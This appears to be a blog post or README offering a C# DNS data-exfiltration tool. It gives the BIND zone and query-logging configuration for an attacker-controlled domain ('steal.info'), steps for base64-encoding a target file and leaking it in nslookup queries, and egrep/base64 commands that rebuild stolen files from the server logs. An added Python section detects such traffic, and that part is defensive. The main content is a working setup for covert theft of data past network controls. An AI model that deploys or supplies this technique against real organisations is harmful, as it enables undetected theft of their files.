What is it?
Bad guys use various methods to exfiltrate data from an organization or any other target. Basically, they need to exfiltrate the data without being detected. Most organizations use firewalls and IDS to secure their network but still allow DNS (incoming/outgoing) 😀 so over DNS we can transfer files and other important stuff 😉 Here I wrote a simple C# script to demonstrate the attack. For Educational Purposes Only.
How does it work?
The idea is simple: the script encodes your data, splits it into small parts and makes nslookup requests for each part to a remote server you control. You then parse the query logs on that server and decode the file.
Prerequisite
- Linux box with a DNS server (BIND)
- also you need to enable dns query logging 🙂
- DnsExfiltration Script
This is how my configuration files look:

cat named.conf
```
include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";
logging {
    channel querylog {
        file "/var/log/qrlog";
        print-category yes;
        print-time yes;
    };
    category queries { querylog; };
};
```

cat db.steal.info
```
$TTL 86400
@   IN  SOA steal.info. root.localhost. (
            1         ; Serial
            604800    ; Refresh
            86400     ; Retry
            2419200   ; Expire
            86400 )   ; Negative Cache TTL
;
@   IN  NS  localhost.
    IN  A   10.0.0.1
```

cat named.conf.local
```
zone "steal.info" {
    type master;
    file "/etc/bind/db.steal.info";
};
```
Getting started
- Download and edit the DnsExfiltration Script
- `static String Domain = "YOUR-DOMAIN-NAME"; // add your bind domain`
- `static String NSserver = "YOUR-NAME-SERVER"; // add your dns server ip address`
- Call `ConvertInto64(string FileTosteal, string PathTosaveEncodedFile)` in the main method
- Call `SendFile(string PathTosaveEncodedFile)`
- On the Linux box, open a terminal and run this command to reassemble the file:
- `egrep -o "[a-zA-Z0-9+/]+={0,2}[a-zA-Z0-9+/]+={0,2}.YOUR-DOMAIN-NAME" /var/log/qrlog | cut -d . -f1 | uniq | awk '!a[$0]++' > /pathToSave/file.bin`
- `base64 -d file.bin > decoded.jpg`
- Done!
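For the defender's side of the same setup, here is an added Python example (not part of the original post or the DnsExfiltration script) that scans BIND query-log lines like the ones written to /var/log/qrlog above and flags zones receiving many long, high-entropy subdomains drawn only from the base64 alphabet. The log lines are constructed, and the length, entropy and count thresholds are assumptions to tune per environment.

```python
import math
import re
from collections import defaultdict

# Constructed BIND query-log lines in the format the logging channel above
# produces (print-time and print-category on). Not captured from real traffic.
SAMPLE_LOG = """\
11-Mar-2024 09:15:01.101 queries: info: client 10.0.0.5#41002 (www.example.com): query: www.example.com IN A +E(0) (10.0.0.1)
11-Mar-2024 09:15:01.204 queries: info: client 10.0.0.5#41003 (/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgMCAgMDAwMEAw.steal.info): query: /9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgMCAgMDAwMEAw.steal.info IN A +E(0) (10.0.0.1)
11-Mar-2024 09:15:01.305 queries: info: client 10.0.0.5#41004 (MEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMU.steal.info): query: MEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMU.steal.info IN A +E(0) (10.0.0.1)
11-Mar-2024 09:15:01.406 queries: info: client 10.0.0.5#41005 (FRUVDA8XGBYUGBIUFRT/2wBDAQMDAwQDBAUEBAUKBwYHCgsLCg.steal.info): query: FRUVDA8XGBYUGBIUFRT/2wBDAQMDAwQDBAUEBAUKBwYHCgsLCg.steal.info IN A +E(0) (10.0.0.1)
11-Mar-2024 09:15:02.010 queries: info: client 10.0.0.7#51000 (mail.example.com): query: mail.example.com IN MX +E(0) (10.0.0.1)
"""

QUERY_RE = re.compile(r"query: (\S+) IN (\S+)")
B64_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")

def shannon_entropy(s):
    """Bits per character; 'www' scores 0.0, encoded payload chunks score high."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def parse_queries(log_text):
    """Yield (qname, qtype) for every 'query:' entry in a BIND query log."""
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group(1), m.group(2)

def split_name(qname):
    """Split 'sub.zone.tld' into (subdomain, zone); the last two labels are
    treated as the zone (a public-suffix list would be more accurate)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def suspicious_zones(log_text, min_sub_len=30, min_entropy=3.5, min_unique=3):
    """Return {zone: distinct_subdomains} for zones whose subdomains look like
    encoded chunks: long, base64-alphabet only, high entropy, many distinct."""
    hits = defaultdict(set)
    for qname, _ in parse_queries(log_text):
        sub, zone = split_name(qname)
        if len(sub) < min_sub_len or not set(sub) <= B64_ALPHABET:
            continue
        if shannon_entropy(sub) >= min_entropy:
            hits[zone].add(sub)
    return {z: len(s) for z, s in hits.items() if len(s) >= min_unique}

if __name__ == "__main__":
    print(suspicious_zones(SAMPLE_LOG))  # {'steal.info': 3}
```

Ordinary hostnames (www, mail) drop out on length alone, so the entropy check only has to separate encoded chunks from legitimately long labels such as CDN or tracking hostnames.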
Demo Video
I tested this script with the following file types and it works 🙂
- jpg 1 MB
- mp3 3 MB
- exe 1 MB
Happy Hacking!
Reference
https://community.infoblox.com/t5/Community-Blog/DNS-Data-Exfiltration-How-it-works/ba-p/3664